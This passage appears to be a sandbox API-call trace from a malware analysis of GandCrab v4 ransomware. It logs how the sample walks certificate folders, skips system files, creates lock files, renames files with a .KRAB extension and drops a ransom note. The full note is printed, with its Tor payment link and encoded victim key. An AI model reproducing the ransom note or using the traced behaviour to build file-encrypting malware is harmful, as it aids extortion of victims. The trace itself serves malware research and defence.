(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\KRAB-DECRYPT.txt") returned 99 [0062.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\KRAB-DECRYPT.txt") returned 99 [0062.161] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.161] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.161] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.161] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.161] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.161] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.161] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.161] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.162] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.162] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.162] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.162] FindNextFileW (in: hFindFile=0xfbd6a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0062.162] FindClose (in: hFindFile=0xfbd6a0 | out: hFindFile=0xfbd6a0) returned 1 [0062.162] CloseHandle (hObject=0x448) returned 1 [0062.163] FindNextFileW (in: hFindFile=0xfbd720, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.163] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0062.163] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0062.163] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CRLs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0062.163] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0062.163] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.163] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.163] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.163] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.163] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.163] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.164] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.164] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\KRAB-DECRYPT.txt") returned 92 [0062.164] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0062.165] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.165] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.165] CloseHandle (hObject=0x448) returned 1 [0062.166] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.166] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.166] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0x170)) [0062.166] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.167] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.167] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.167] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a08d2ca4dee3d.lock") returned 98 [0062.167] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0062.168] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.168] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 75 [0062.168] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0062.168] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd520 [0062.168] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.168] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.168] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.169] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.169] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.169] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.169] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.169] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a08d2ca4dee3d.lock" [0062.169] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.169] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 103 [0062.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\d2ca4a08d2ca4dee3d.lock") returned 98 [0062.169] lstrlenW (lpString=".lock") returned 5 [0062.169] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.169] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.170] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.170] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.170] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.170] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.170] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.170] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\KRAB-DECRYPT.txt" [0062.170] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.171] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\KRAB-DECRYPT.txt.KRAB") returned 96 [0062.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\KRAB-DECRYPT.txt") returned 91 [0062.171] lstrlenW (lpString=".txt") returned 4 [0062.171] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.171] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.171] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\KRAB-DECRYPT.txt") returned 91 [0062.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\KRAB-DECRYPT.txt") returned 91 [0062.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.171] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.172] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.172] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.172] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.172] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.172] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.172] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.172] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.172] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.172] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0062.172] FindClose (in: hFindFile=0xfbd520 | out: hFindFile=0xfbd520) returned 1 [0062.172] CloseHandle (hObject=0x448) returned 1 [0062.173] FindNextFileW (in: hFindFile=0xfbd720, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.173] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0062.173] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0062.173] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CTLs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0062.173] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0062.173] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.173] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.173] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.173] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.173] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.173] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.174] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.174] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\KRAB-DECRYPT.txt") returned 92 [0062.174] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0062.174] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 